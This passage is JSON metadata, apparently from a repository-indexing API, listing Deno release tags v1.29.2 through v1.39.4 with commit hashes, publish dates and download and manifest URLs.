oad.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","ht